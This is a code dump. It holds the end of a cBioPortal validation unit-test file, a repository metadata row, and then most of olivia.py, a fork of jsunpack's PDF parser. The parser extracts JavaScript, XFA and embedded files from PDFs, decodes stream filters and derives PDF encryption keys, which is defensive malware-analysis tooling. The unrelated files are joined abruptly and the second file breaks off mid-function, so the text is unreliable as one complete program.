args = ['--root-directory', 'test_data',
'--list-of-studies', 'study_es_0,study_es_1,study_es_invalid,study_es_3',
'--portal_info_dir', PORTAL_INFO_DIR]
args = validateStudies.interface(args)
exit_status = validateStudies.main(args)
self.assertEqual(1, exit_status)
def test_logs_study_label_before_validation_messages(self):
"""The log file should start with a line describing the study.
A subsequent study should have its own header line.
"""
# given
with TemporaryDirectory() as out_dir_path:
args = [
'--root-directory', 'test_data',
'--list-of-studies', 'study_various_issues,study_es_0',
'--portal_info_dir', PORTAL_INFO_DIR,
'--html-folder', out_dir_path
]
# when
with redirect_stdout(StringIO()):
parsed_args = validateStudies.interface(args)
validateStudies.main(parsed_args)
# then
log_file_path = glob.glob(os.path.join(out_dir_path, 'log*.txt'))[0]
with open(log_file_path) as log_file:
log_file_lines = log_file.readlines()
self.assertIn('study_various_issues', log_file_lines[0])
last_line_of_first_study = next(
index
for index, line
in enumerate(log_file_lines)
if 'Validation complete' in line)
self.assertIn(
'study_es_0',
log_file_lines[last_line_of_first_study + 1])
class ValidateStudiesWithEagerlyFlushingCollapser(unittest.TestCase):
"""Test validation with the collapser flushing due to buffer capacity.
When validating very large studies, it will flush partway through a study.
This can be simulated with a smaller study by lowering the buffer capacity.
"""
def setUp(self):
"""Make the collapsing log message handler flush more eagerly."""
class EagerFlusher(logging.handlers.MemoryHandler):
def __init__(self, *args, **kwargs):
"""Set the buffer capacity to 3 regardless of args."""
# leave out any capacity argument from args and kwargs
args = args[1:]
kwargs = {k: v for k, v in list(kwargs.items()) if k != 'capacity'}
# pass 3 as the capacity argument
super(EagerFlusher, self).__init__(3, *args, **kwargs)
class EagerFlushingCollapser(
cbioportal_common.CollapsingLogMessageHandler,
EagerFlusher):
"""CollapsingLogMessageHandler with EagerFlusher overrides."""
pass
self.original_collapser = cbioportal_common.CollapsingLogMessageHandler
cbioportal_common.CollapsingLogMessageHandler = EagerFlusher
def tearDown(self):
"""Restore the unmodified collapsing log message handler."""
cbioportal_common.CollapsingLogMessageHandler = self.original_collapser
def test_leaves_stdout_uncluttered_if_validation_produces_errors(self):
"""Test flushing the collapsing logger halfway through a study.
This should not spill the validation messages to stdout as it previously
did, even crashing with a KeyError sometimes because non-validator
log messages got flushed into the collapsing logic.
"""
output_stream = StringIO()
with redirect_stdout(output_stream):
args = validateStudies.interface([
'--root-directory', 'test_data',
'--list-of-studies', 'study_various_issues/',
'--portal_info_dir', PORTAL_INFO_DIR])
validateStudies.main(args)
self.assertNotIn(
'ERROR',
output_stream.getvalue(),
'The validation errors should not be printed to the console.')
if __name__ == '__main__':
unittest.main(buffer=True)
| agpl-3.0 | 3,534,768,252,649,040,400 | 36.050505 | 109 | 0.615867 | false | 3.99782 | true | false | false |
trogdorsey/olivia | olivia/olivia.py | 1 | 57346 | '''
Fork of pdf.py from jsunpack
'''
import binascii
import cStringIO
import Crypto.Cipher.ARC4 as ARC4
import Crypto.Cipher.AES as AES
import hashlib
import lzw
import re
import string
import struct
import xml.dom.minidom
import zlib
class pdfobj(object):
#this class parses single "1 0 obj" up till "endobj" elements
def __init__(self, keynum, data):
self.tags = [] #tuples of [key,value]
self.keynum = keynum
self.indata = data
self.tagstream = ''
self.tagstreamError = False
self.tagstreamChanged = False
self.hiddenTags = 0 #tags containing non-normalized data
self.children = [] #if this has a script tag, parse children of it
self.staticScript = '' #for those things not within objects append to this structure
#special children types
self.isJS = False #could be a reference (or self contains JS)
self.isDelayJS = False #for OpenAction
self.isEmbedded = False #for /EmbeddedFile
self.isAnnot = False
self.isObjStm = []
self.is_xfa = False
self.is_xfaData = False
self.isEncrypt = False
self.isFromObjStream = False
self.contains_comment = False
self.knownName = '' #related to annots
self.subj = '' #related to annots
self.doc_properties = []
#self.isTitle = False
#self.isKeywords = False
self.xfaChildren = []
if self.indata:
self.parseObject()
def __repr__(self):
out = 'pdfobj %s\n' % (self.keynum)
if self.children:
out += '\tchildren %s\n' % (str(self.children))
if self.isJS:
out += '\tisJS'
if self.isAnnot:
out += '\tisAnnot'
for doc_prop in self.doc_properties:
out += '\tis%s' % doc_prop
if self.isDelayJS:
out += '\tisDelayJS'
return out
def parseTag(self, tag, stream):
'''
Input: tag is the contents of /Tag1 value1 /Tag2 value2
stream is (optional) contents between stream and endstream
Output: self.tags and self.tagstream
If stream is not set, then we should set it before it gets assigned to tagstream
'''
state = 'INIT'
precomment_state = 'INIT'
curtag = ''
curval = ''
multiline = 0 # for tracking multiline in TAGVALCLOSED state
uncleaned_tags = [] #output of statemachine
num_paren_open = 0
is_bracket_closed = True
for index in range(0, len(tag)):
#if self.keynum == '23 0':
# print state, index, hex(index), hex(ord(tag[index])), tag[index], curtag, len(curval), num_paren_open, is_bracket_closed
if state == 'INIT':
is_bracket_closed = True
if tag[index] == '/':
state = 'TAG'
elif state == 'TAG':
is_bracket_closed = True
if re.match('[a-zA-Z0-9#]', tag[index]):
curtag += tag[index]
elif tag[index] == '/':
if curtag:
uncleaned_tags.append([state, curtag, '']) # no tag value
curtag = ''
state = 'TAG'
elif tag[index] == '(':
state = 'TAGVALCLOSED'
num_paren_open = 0
multiline = 0
curval = '' # ignore the (, for the most part
elif tag[index] == '[': # start of an array... probably
state = 'TAGVAL'
is_bracket_closed = False
curval = '['
elif tag[index] == '\n':
state = 'TAG'
elif tag[index] == '%':
precomment_state = state
state = 'COMMENT'
else:
state = 'TAGVAL'
curval = ''
elif state == 'COMMENT':
self.contains_comment = True
if tag[index] in ['\x0d', '\x0a']:
state = precomment_state
elif state == 'TAGVAL':
# Weird cases with arrays
if tag[index] == '/' and (not tag[index - 1] == '\\\\') and \
((curval and curval[0] == '[' and is_bracket_closed) or \
(not curval) or (curval and curval[0] != '[')):
# a new open bracket and we are not in the middle of a bracket
# or there is bracket here, but we ignore this one
if curtag or curval:
uncleaned_tags.append([state, curtag, curval])
state = 'TAG'
curtag = curval = ''
elif curval and curval[0] == '[' and tag[index] == ']': # finished array
curval += tag[index]
is_bracket_closed = True
elif tag[index] == '(':
#what do we do with curval? toss it
if re.match(r'^[\s\[\]\(\)<>]*$', curval): # look for any characters that indicate this isn't a TAGVALCLOSED
state = 'TAGVALCLOSED'
multiline = 0
if curtag in ['JS', 'O', 'U']:
num_paren_open += 1
if len(curval) > 0:
#print '\ttossed out %d characters (%s) because we entered TAGVALCLOSED state' % (len(curval),curval)
curval = ''
else: #keep processing?
curval += tag[index]
elif tag[index] == '[' and curtag == 'XFA': # coming up on an array listing the XFA objects
is_bracket_closed = False
state = 'TAGVALCLOSED'
# Normally ignore these, but they are useful when parsing the ID in the trailer
elif (tag[index] == '<' or tag[index] == '>') and self.keynum != 'trailer':
pass
elif tag[index] == ' ' and curval == '':
pass #already empty
elif tag[index] == '%':
precomment_state = state
state = 'COMMENT'
else:
curval += tag[index]
elif state == 'TAGVALCLOSED':
#in this state we know that the code started with (... therefore we can't end until we see )
#the code could also have enclosed ( chars; therefore, this algorithm is greedy
grab_more = 0 # if grab_more is set to 1, it means the tag isn't closing yet
if tag[index] == ')': #possible closing tag
if (tag[index - 1] == '\\' and tag[index-2] != '\\') or \
(tag[index-1] == '\\' and tag[index-2] == '\\' and tag[index-3] == '\\') or \
((curtag == 'JS' or curtag == 'JavaScript') and num_paren_open > 0 and tag[index-1] == '\\') or \
(curtag == 'XFA' and not is_bracket_closed): # we are in the middle of a JS string or an XFA array
grab_more = 1
if num_paren_open > 0:
num_paren_open -= 1
elif multiline: #tricky cases
#either a newline or "(" character leads us here.
#IGNORE THESE
#if re.match('^\)\s*($|\n\s*([^\)\s])',tag[index:]):
# #yep its closing time
# #this regex ensures there isn't another following close tag
#res = re.match('^(.*)\) $',tag[index:])
if index + 1 < len(tag):
indexParen = tag[index + 1:].find(')')
#indexNewL = tag[index+1:].find('\n')
if indexParen > -1: # and (indexNewL == -1 or indexNewL > indexParen):
if not re.match('^\s*\/[A-Za-z0-9]+\s*\(', tag[index + 1:]):
grab_more = 1
if grab_more:
curval += tag[index]
else: #ok ok, its simply closing
uncleaned_tags.append([state, curtag, curval])
state = 'INIT'
#print '%s (TAGVALCLOSED), length=%d bytes with %d/%d completed (around %s)' % (curtag, len(curval),index,len(tag), tag[index-20:index+20])
curtag = curval = ''
elif tag[index] == '(': #tag[index] == '\n'
num_paren_open += 1
curval += tag[index]
elif tag[index] == ']' and curtag != 'JS' and not is_bracket_closed: # can have ]s inside JS strings...
is_bracket_closed = True
elif tag[index] == '%' and num_paren_open == 0 and curtag not in ['JS', 'O', 'U']: #can have % inside JS strings... And in O and U strings in Encrypt Objects
precomment_state = state
state = 'COMMENT'
else:
curval += tag[index]
else:
print 'invalid state in parseTag: %s' % state
if curtag: #an ending tag with NO final separator
uncleaned_tags.append(['ENDTAG', curtag, curval])
#clean uncleaned_tags and put in self.tags instead
for source, tagtype, tagdata in uncleaned_tags:
newtagtype = pdfobj.fixPound(tagtype)
if newtagtype != tagtype:
self.hiddenTags += 1
tagtype = newtagtype
#newlines in tagtype? ONLY for state != TAGVALCLOSED
if source != 'TAGVALCLOSED':
#its okay to replace newlines, spaces, tabs here
tagdata = re.sub('[\s\r\n]+', ' ', tagdata)
# You can have octal further in the string, but that can sometimes cause problems
# so if there is a problem, just back out and use the original
if re.search('([^\\\\]\\\\[0-9]{3}\s*)+', tagdata): #ie. need to convert \040 == 0x20
original = tagdata
try:
tagdata = re.sub('\\\\([0-9]{3})', lambda mo: chr(int(mo.group(1), 8)), tagdata)
except:
tagdata = original
# to my dismay, there are lot of tags to unescape
unescaped_tagdata = ''
backslash = False
for d in tagdata:
if backslash:
backslash = False
if d == 'b':
unescaped_tagdata += '\b'
elif d == 'f':
unescaped_tagdata += '\f'
elif d == 'n':
unescaped_tagdata += '\n'
elif d == 'r':
unescaped_tagdata += '\r'
elif d == 's':
unescaped_tagdata += 's' # this one is weird, I know
elif d == 't':
unescaped_tagdata += '\t'
elif d in ('(', ')', '\\'):
unescaped_tagdata += d
elif d == '\'' and tagtype == 'JS':
unescaped_tagdata += '\\\''
elif d == '\\':
backslash = True
else:
unescaped_tagdata += d
tagdata = unescaped_tagdata
#print 'set stream to %s; %s; %d bytes' % (source, tagtype, len(tagdata))
#sometimes it's a short snippet without a ; at the end. So add a ;
if len(tagdata) < 50 and tagdata.find('AFDate') != -1 and tagdata[-1] != ';':
tagdata += ';'
# Only really want the JavaScript, and then only when it's not in a unicode format
if not stream and \
(source == 'TAGVALCLOSED' or source == 'ENDTAG') and \
(tagtype == 'JS' or tagtype == 'JavaScript') and \
len(tagdata) > 2 and tagdata[0:2] != '\xfe\xff':
stream = tagdata
self.tags.append([source, tagtype, tagdata])
self.tagstream = stream
if olivia.DEBUG:
print 'obj %s: ' % (self.keynum)
for source, tagtype, tagdata in self.tags:
tagtxt = '\ttag %s' % re.sub('\n', '', tagtype)
if len(tagdata) > 30:
tagtxt += ' = [data %d bytes]' % len(tagdata)
elif tagdata:
tagtxt += ' = '
for c in tagdata:
if c in string.printable and c != '\n':
tagtxt += c
else:
tagtxt += '\\x%02x' % (ord(c))
print '%-50s (%s)' % (tagtxt, source)
#end
def parseChildren(self):
'''
Input: self.tags (must be populated)
Output: self.children
'''
for state, k, kval in self.tags:
hasRef = re.search('\+?(\d+)\s+\+?(\d+)\s+R', kval)
if hasRef:
objkey = hasRef.group(1) + ' ' + hasRef.group(2)
self.children.append([k, objkey])
if k == 'XFA':
kids = re.findall('(\d+\s+\d+)\s+R', kval)
for kid in kids:
self.xfaChildren.append([k, kid])
def parseObject(self):
#previously this was non-greedy, but js with '>>' does mess things up in that case
#to solve the problem, do both
#if olivia.DEBUG:
# print '\tstarting object len %d' % len(self.indata)
tags = re.findall('<<(.*)>>[\s\r\n%]*(?:stream[\s\r\n]*(.*?)[\r\n]*endstream)?', self.indata, re.MULTILINE | re.DOTALL | re.IGNORECASE)
if tags:
for tag, stream in tags:
gttag = tag.find('>>')
streamtag = tag.find('stream')
endstream_tag_end = self.indata.rfind('endstream')
endstream_tag_begin = self.indata.find('endstream')
#
# This means that there was an improper parsing because the tag shouldn't contain a stream object
if endstream_tag_end != -1 and 0 < gttag < streamtag:
# do this in case the word stream is in the tag data somewhere...
stream_location_match = re.search('>>[\s\r\n%]*stream?', self.indata, re.MULTILINE | re.DOTALL | re.IGNORECASE)
if stream_location_match:
stream_location = stream_location_match.start()
else:
stream_location = self.indata.find('stream')
stream_start = self.indata.find('stream', stream_location)
stream_match = re.search('stream[\s\r\n]*(.*?)[\r\n]*endstream', self.indata, re.MULTILINE | re.DOTALL | re.IGNORECASE)
stream_data = ''
# Only search to start of stream, a compressed stream can have >> in it, and that will through off the regex
tag_match = re.search('<<(.*)>>', self.indata[0:stream_start], re.MULTILINE | re.DOTALL | re.IGNORECASE)
if tag_match and stream_match:
stream_data = stream_match.group(1)
tag = tag_match.group(1)
tags = [(tag, stream_data)]
#
# This checks if the word endstream happens inside the stream
if endstream_tag_begin != -1 and endstream_tag_begin != endstream_tag_end:
stream_location_match = re.search('>>[\s\r\n%]*stream?', self.indata, re.MULTILINE | re.DOTALL | re.IGNORECASE)
if stream_location_match:
stream_location = stream_location_match.start()
else:
stream_location = self.indata.find('stream')
stream_start = self.indata.find('stream', stream_location)
stream_match = re.search('stream[\s\r\n]*(.*?)[\r\n]*endstream$', self.indata, re.MULTILINE | re.DOTALL | re.IGNORECASE)
tag_match = re.search('<<(.*)>>', self.indata[0:stream_start], re.MULTILINE | re.DOTALL | re.IGNORECASE)
stream_data = ''
if stream_match and tag_match:
stream_data = stream_match.group(1)
tag = tag_match.group(1)
tags = [(tag, stream_data)]
if not tags: #Error parsing object!
return
for tag, stream in tags:
self.parseTag(tag, stream)
self.parseChildren()
@staticmethod
def fixPound(i):
#returns '#3a' substituted with ':', etc
#strips newlines, '[', and ']' characters
#this allows indexing in arrays
i = re.sub('[\[\]\n]', '', i)
i = re.sub('<<$', '', i)
return re.sub('#([a-fA-F0-9]{2})', lambda mo: chr(int('0x' + mo.group(1), 0)), i)
@staticmethod
def lzwdecode(data):
try:
return ''.join(lzw.LZWDecoder(cStringIO.StringIO(data)).run())
except:
return data
@staticmethod
def rldecode(input):
output = ''
index = 0
try:
key_len = ord(input[index])
while key_len != 0x80:
index += 1
if key_len & 0x80:
output += input[index] * (256 - key_len + 1)
index += 1
else:
output += input[index:index + key_len + 1]
index += key_len + 1
key_len = ord(input[index])
except:
return input
return output
@staticmethod
def ascii85(input):
outdata = ''
input = re.sub('\s', '', input)
input = re.sub('^<~', '', input)
input = re.sub('~>$', '', input)
for i in range(0, len(input), 5):
bytes = input[i:i + 5]
fraglen = len(bytes)
if bytes[0] == 'z':
pass #ignore
if bytes[0] == 'y':
pass #ignore
if i + 5 >= len(input):
#data not divisible by 5
bytes = input[i:]
fraglen = len(bytes)
if fraglen > 1:
bytes += 'vvv'
total = 0
shift = 85 * 85 * 85 * 85
for c in bytes:
total += shift * (ord(c) - 33)
shift /= 85
if fraglen > 1:
outdata += chr((total >> 24) % 256)
if fraglen > 2:
outdata += chr((total >> 16) % 256)
if fraglen > 3:
outdata += chr((total >> 8) % 256)
if fraglen > 4:
outdata += chr((total) % 256)
return outdata
class olivia(object):
DEBUG = 0
def __init__(self, indata, infile, password=''):
self.indata = indata
self.size = len(self.indata)
self.infile = infile
self.objects = {}
self.pages = []
self.numPages = 0
self.list_obj = []
self.jsObjects = []
self.encrypt_key = ''
self.encrypt_key_valid = False
self.encrypt_object = {}
self.encrypt_password = password
self.xfaObjects = []
def parse(self):
'''
#parsing xref tables
xrefs = re.findall('xref\s*\n\d+\s+(\d+)\s*\n((\d+\s+\d+\s+[fn]\s*\n)+)\s*trailer\s*\n',self.indata)#.*?startxref\s*\n(\d+)\s*\n\s*%%EOF\s*',self.indata)
for entries, table,junk in xrefs:
entries = int(entries)
print 'entries=',entries
lines = table.split('\n')
for line in lines:
valid = re.match('\s*(\d+)\s+(\d+)\s+[fn]\s*',line)
if valid:
offset,zero = int(valid.group(1)), int(valid.group(2))
print 'line = ', offset, zero
#offset = int(offset)
'''
objs = re.findall('\n?(\d+)\s+(\d+)[\x00\s]+obj[\s]*(.*?)\s*\n?(?<!%)(endobj|.ndobj|e.dobj|en.obj|end.bj|endo.j|endob.|objend)', self.indata, re.MULTILINE | re.DOTALL)
if objs:
for obj in objs:
#fill all objects
key = obj[0] + ' ' + obj[1]
if not key in self.list_obj:
self.list_obj.append(key)
else: # There are cases with the two objects have the same number, because PDFs are awesome that way
key = key + ' dup'
self.list_obj.append(key)
self.objects[key] = pdfobj(key, obj[2])
trailers = re.findall('(trailer[\s\r\n]*<<(.*?)>>)', self.indata, re.MULTILINE | re.DOTALL)
for trailertags in trailers:
trailerData = trailertags[1]
#
# Check for a dictionary inside the trailer
#
isDict = trailerData.find("<<")
if isDict != -1:
offset = self.indata.find(trailertags[0])
trailerData = self.extractTrailerData(offset)
trailerstream = '' #no stream in trailer
trailerobj = pdfobj('trailer', '') #empty second parameter indicates not to do an object parse
trailerobj.parseTag(trailerData, trailerstream)
trailerobj.parseChildren()
key = 'trailer'
if not key in self.list_obj:
self.list_obj.append(key)
else: # There are cases with the two objects have the same number, because PDFs are awesome that way
key = key + ' dup'
self.list_obj.append(key)
self.objects[key] = trailerobj
for tag, value in trailerobj.children:
# If there is an encrypt object, it should be specified in the trailer
# (in practice, that's not always the case... *sigh*)
if tag == 'Encrypt' and not self.encrypt_key_valid:
# Make sure the encrypt object is actually there
if value in self.objects:
self.objects[value].isEncrypt = True
self.encrypt_object = self.populate_encrypt_object(self.objects[value])
fileId = ''
for state, tag, val in trailerobj.tags:
if tag == 'ID':
ids = re.findall('<([\d\w]*)>', val)
# Just in case the ID has something I'm not expecting
if ids:
try:
fileId = binascii.unhexlify(ids[0])
except:
pass
else:
fileId = val
# yay for default passwords
padding = binascii.unhexlify('28BF4E5E4E758A4164004E56FFFA01082E2E00B6D0683E802F0CA9FE6453697A')
# limit of 16 characters
passwd = (self.encrypt_password + padding)[0:32]
self.encrypt_key = self.compute_encrypt_key(self.encrypt_object, passwd, fileId)
self.encrypt_key_valid = self.validate_encrypt_key(self.encrypt_key, padding, fileId, self.encrypt_object)
break
# but wait, sometimes the encrypt object is not specified in the trailer, yet sometimes another
# object has it in it, so search for it now
if not self.encrypt_key_valid:
encrypt_object_key = ''
fileId = '\x00' * 16
for key in self.list_obj:
if key == 'trailer':
continue
for kstate, k, kval in self.objects[key].tags:
if k == 'Encrypt':
for child_type, child_key in self.objects[key].children:
if child_type == 'Encrypt':
self.objects[child_key].isEncrypt = True
encrypt_object_key = child_key
break
if k == 'ID':
ids = re.findall('\[([\d\w]*)\]', kval)
if ids:
firstId = ids[0]
# for some reason it's there twice...
firstId = firstId[0:len(firstId)/2]
try:
fileId = binascii.unhexlify(firstId)
except:
pass
if encrypt_object_key and fileId:
break
if encrypt_object_key and fileId: # we found it
self.encrypt_object = self.populate_encrypt_object(self.objects[encrypt_object_key])
padding = binascii.unhexlify('28BF4E5E4E758A4164004E56FFFA01082E2E00B6D0683E802F0CA9FE6453697A')
# limit of 32 characters here
passwd = (self.encrypt_password + padding)[0:32]
self.encrypt_key = self.compute_encrypt_key(self.encrypt_object, passwd, fileId)
if self.encrypt_object['V'] == 5 and self.encrypt_key != '\xca\x1e\xb0' and 'Perms' in self.encrypt_object:
aes = AES.new(self.encrypt_key, AES.MODE_ECB)
decryptedPerms = aes.decrypt(self.encrypt_object['Perms'])
if decryptedPerms[0:4] == self.encrypt_object['P'][0:4] and decryptedPerms[9:12] == 'adb':
self.encrypt_key_valid = True
else:
self.encrypt_key_valid = self.validate_encrypt_key(self.encrypt_key, padding, fileId, self.encrypt_object)
for key in self.list_obj: #sorted(self.objects.keys()):
#set object options
if self.encrypt_key and self.encrypt_key_valid:
if self.objects[key].tagstream and not self.objects[key].isEncrypt and not self.objects[key].isFromObjStream:
if self.encrypt_object['algorithm'] == 'RC4':
self.objects[key].tagstream = self.decryptRC4(self.objects[key].tagstream, key)
elif self.encrypt_object['algorithm'] == 'AES':
self.objects[key].tagstream = self.decryptAES(self.objects[key].tagstream, key)
self.objects[key].tagstreamModified = True
for kstate, k, kval in self.objects[key].tags:
if k == 'OpenAction':
# sometimes OpenAction is an array, so check for that
if not kval or kval[0] != '[':
self.objects[key].isDelayJS = True
for child_type, child_key in self.objects[key].children:
if child_type == 'OpenAction' and child_key in self.objects:
self.objects[child_key].isDelayJS = False # This isn't the JS, the children have it
for cState, cType, cValue in self.objects[child_key].tags:
if cType in ['JavaScript', 'JS']:
self.objects[child_key].isDelayJS = True
elif olivia.DEBUG:
print 'error: not a valid object for child (%s)' % (child_key)
if k in ['JavaScript', 'JS']:
self.objects[key].isJS = True
foundChildJs = False
for child_type, child_key in self.objects[key].children: # Is the JS with the children?
if child_key in self.objects and child_type in ['JS', 'JavaScript']:
self.objects[child_key].isJS = True
self.objects[key].isJS = False
if child_key not in self.jsObjects:
self.jsObjects.append(child_key)
foundChildJs = True
if not foundChildJs: # JS is here
if key not in self.jsObjects:
self.jsObjects.append(key)
if k == 'XFA':
self.objects[key].is_xfa = True
for xfaType, xfaKey in self.objects[key].xfaChildren:
if xfaKey in self.objects:
self.objects[xfaKey].is_xfaData = True
if k == 'NM':
self.objects[key].knownName = kval
if k == 'Subj':
self.objects[key].subj = kval
if k == 'EmbeddedFile':
self.objects[key].isEmbedded = True
if k == 'Annot':
#since JavaScript can call getAnnots() we must populate these entries now
#don't handle /Annots (precursory tag), children will contain Subj element
self.objects[key].isAnnot = True
for type, childkey in self.objects[key].children:
if childkey in self.objects and (type == 'Subj'):
self.objects[childkey].isAnnot = True
self.jsObjects.append(childkey)
if k == 'Page':
hasContents = False
for childtype, childkey in self.objects[key].children:
if childtype == 'Contents':
self.pages.append(childkey)
hasContents = True
if not hasContents:
self.pages.append(key)
if k == 'Pages':
for pagestate, pagetag, pagevalue in self.objects[key].tags:
if pagetag == 'Count':
try:
self.numPages += int(pagevalue)
except ValueError:
# Check children
for childtype, childkey in self.objects[key].children:
if childtype == 'Count':
pagevalue = self.objects[childkey].indata
try:
self.numPages += int(pagevalue)
except ValueError:
pass
#populate pdfobj's doc_properties with those that exist
enum_properties = ['Title', 'Author', 'Subject', 'Keywords', 'Creator', 'Producer', 'CreationDate', 'ModDate', 'plot']
if k in enum_properties:
value = kval
value = re.sub('[\xff\xfe\x00]', '', value)
isReference = re.match('^\s*\d+\s+\d+\s+R\s*$', value)
if isReference:
validReference = False
for child_type, child_key in self.objects[key].children:
if child_key in self.objects and (child_type == k):
validReference = True
self.objects[child_key].doc_properties.append(k.lower())
self.jsObjects.append(child_key)
if not validReference:
if olivia.DEBUG:
print '[warning] possible invalid reference in %s' % (k)
self.objects[key].doc_properties.append(k.lower())
else:
#not a reference, use the direct value
value = re.sub('\'', '\\x27', value)
self.objects[key].staticScript += 'info.%s = String(\'%s\');\n' % (k.lower(), olivia.do_hexAscii(value))
self.objects[key].staticScript += 'this.%s = info.%s;\n' % (k.lower(), k.lower())
self.objects[key].staticScript += 'info.%s = info.%s;\n' % (k, k.lower())
self.objects[key].staticScript += 'app.doc.%s = info.%s;\n' % (k.lower(), k.lower())
self.objects[key].staticScript += 'app.doc.%s = info.%s;\n' % (k, k.lower())
if k == 'CreationDate':
self.objects[key].staticScript += 'app.doc.creationDate = info.creationdate;\n'
self.objects[key].staticScript += 'info.creationDate = info.creationdate;\n'
if key not in self.jsObjects:
self.jsObjects.append(key)
for kstate, k, kval in self.objects[key].tags:
# Multiple filters, sometimes pound issues, throws off the decode, so handle it here
if k == 'Filter':
kval = pdfobj.fixPound(kval)
filters = re.findall('/(\w+)', kval)
if filters:
for filter in filters:
if filter == 'FlateDecode' or filter == 'Fl':
try:
self.objects[key].tagstream = zlib.decompress(self.objects[key].tagstream)
except zlib.error, msg:
if olivia.DEBUG:
print 'failed to decompress object %s (inlen %d)' % (key, len(self.objects[key].tagstream))
print self.objects[key].tagstream
self.objects[key].tagstream = '' #failed to decompress
if filter == 'ASCIIHexDecode' or filter == 'AHx':
result = ''
counter = 0
self.objects[key].tagstream = re.sub('[^a-fA-F0-9]+', '', self.objects[key].tagstream)
for i in range(0, len(self.objects[key].tagstream), 2):
result += chr(int('0x' + self.objects[key].tagstream[i:i + 2], 0))
self.objects[key].tagstream = result
if filter == 'ASCII85Decode' or filter == 'A85':
self.objects[key].tagstream = pdfobj.ascii85(self.objects[key].tagstream)
if filter == 'LZWDecode' or filter == 'LZW':
self.objects[key].tagstream = pdfobj.lzwdecode(self.objects[key].tagstream)
if filter == 'RunLengthDecode' or filter == 'RL':
self.objects[key].tagstream = pdfobj.rldecode(self.objects[key].tagstream)
if k == 'FlateDecode' or k == 'Fl':
try:
self.objects[key].tagstream = zlib.decompress(self.objects[key].tagstream)
except zlib.error, msg:
# There is a chance our regex removed too many \r or \n when pulling out the stream. We probably
# should fix this there, but in the mean time, if it fails, try adding them back.
lame_fixes = ["\n", "\r"]
lame_fix_worked = True
for lame_fix in lame_fixes:
try:
self.objects[key].tagstream = zlib.decompress(self.objects[key].tagstream+lame_fix)
lame_fix_worked = True
break
except zlib.error, msg:
pass
if not lame_fix_worked:
if olivia.DEBUG:
print 'failed to decompress object %s (inlen %d)' % (key, len(self.objects[key].tagstream))
print self.objects[key].tagstream
self.objects[key].tagstream = '' #failed to decompress
if k == 'ASCIIHexDecode' or k == 'AHx':
result = ''
counter = 0
self.objects[key].tagstream = re.sub('[^a-fA-F0-9]+', '', self.objects[key].tagstream)
for i in range(0, len(self.objects[key].tagstream), 2):
result += chr(int('0x' + self.objects[key].tagstream[i:i + 2], 0))
self.objects[key].tagstream = result
if k == 'ASCII85Decode' or k == 'A85':
self.objects[key].tagstream = pdfobj.ascii85(self.objects[key].tagstream)
if k == 'LZWDecode' or k == 'LZW':
self.objects[key].tagstream = pdfobj.lzwdecode(self.objects[key].tagstream)
if k == 'RunLengthDecode' or k == 'RL':
self.objects[key].tagstream = pdfobj.rldecode(self.objects[key].tagstream)
# Check for Object Streams, but only if we don't have an error with tagstream
if not self.objects[key].tagstreamError:
object_stream_data = ''
object_stream_n = 0
object_stream_first = 0
for kstate, k, kval in self.objects[key].tags:
if k == 'ObjStm':
object_stream_data = self.objects[key].tagstream
if k == 'N':
# just in case
try:
object_stream_n = int(kval)
except:
pass
if k == 'First':
# ...
try:
object_stream_first = int(kval)
except:
pass
if object_stream_data != '' and object_stream_n != 0 and object_stream_first != 0:
self.parse_object_stream(object_stream_data, object_stream_n, object_stream_first)
self.objects[key].tagstream = olivia.applyFilter(self.objects[key].tagstream)
if olivia.DEBUG and self.objects[key].tagstream.startswith('MZ'):
print 'PDF file has embedded MZ file'
else:
print 'Fatal error: pdf has no objects in ' + self.infile
def populate_encrypt_object(self, encrypt_object):
e = {}
e['V'] = 0
e['R'] = 0
e['O'] = ''
e['U'] = ''
for state, tag, value in encrypt_object.tags:
# Multiple lengths, referring to different things, take the bigger one, that *should* be right
if tag == 'Length' and 'Length' in e:
if int(value) > int(e[tag]):
e[tag] = value
continue
e[tag] = value
e['KeyLength'] = 5
if 'AESV2' in e or 'AESV3' in e:
e['algorithm'] = 'AES'
else:
e['algorithm'] = 'RC4'
if 'EncryptMetadata' in e:
if e['EncryptMetadata'].lower() == 'false':
e['EncryptMetadata'] = False
else:
e['EncryptMetadata'] = True
if 'V' in e:
e['V'] = int(e['V'])
if e['V'] >= 2 and 'Length' in e:
e['KeyLength'] = int(e['Length'])/8
if 'R' in e:
e['R'] = int(e['R'])
if e['R'] <= 4 and len(e['O']) > 32:
e['O'] = binascii.unhexlify(e['O'].strip())
if e['R'] <= 4 and len(e['U']) > 32:
e['U'] = binascii.unhexlify(e['U'].strip())
if 'P' in e:
e['P'] = struct.pack('L', int(e['P']) & 0xffffffff)
return e
def compute_encrypt_key(self, encrypt_object, password, fileId):
'''Computes the encrypt key based on values in encrypt object'''
if encrypt_object['R'] <= 4:
h = hashlib.md5()
h.update(password)
h.update(encrypt_object['O'])
h.update(encrypt_object['P'][0:4])
h.update(fileId)
if encrypt_object['R'] == 4 and not encrypt_object['EncryptMetadata']:
h.update("\xff\xff\xff\xff")
key = h.digest()[0:encrypt_object['KeyLength']]
if encrypt_object['R'] >= 3:
for i in range(50):
key = hashlib.md5(key[0:encrypt_object['KeyLength']]).digest()
key = key[0:encrypt_object['KeyLength']]
return key
elif encrypt_object['R'] == 5:
user_key = hashlib.sha256(encrypt_object['U'][32:40]).digest()
if user_key == encrypt_object['U'][0:32]: # success!
almost_key = hashlib.sha256(encrypt_object['U'][40:48]).digest()
aes = AES.new(almost_key, AES.MODE_CBC, '\x00'*16)
the_key = aes.decrypt(encrypt_object['UE'])
return the_key
#
# Ok, then check the owner password
#
owner_sha = hashlib.sha256()
owner_sha.update(encrypt_object['O'][32:40])
owner_sha.update(encrypt_object['U'][0:48])
owner_hash = owner_sha.digest()
if owner_hash == encrypt_object['O'][0:32]:
almost_hash = hashlib.sha256()
almost_hash.update(encrypt_object['O'][40:48])
almost_hash.update(encrypt_object['U'][0:48])
almost_key = almost_hash.digest()
aes = AES.new(almost_key, AES.MODE_CBC, '\x00'*16)
the_key = aes.decrypt(encrypt_object['OE'])
return the_key
else:
print "No good", encrypt_object['R']
return '\xca\x1e\xb0'
def validate_encrypt_key(self, key, password, fileId, encrypt_object):
'''Verifies that the encryption key is correct'''
if encrypt_object['R'] == 2:
rc4 = ARC4.new(key)
password_encrypted = rc4.encrypt(password)
if encrypt_object['U'] == password_encrypted:
return True
elif encrypt_object['R'] >= 3:
m = hashlib.md5()
m.update(password)
m.update(fileId)
cHash = m.digest()
rc4 = ARC4.new(key)
dHash = rc4.encrypt(cHash)
for i in range(1, 20):
newKey = ''
for k in key:
newKey += chr(ord(k) ^ i)
stepE = ARC4.new(newKey)
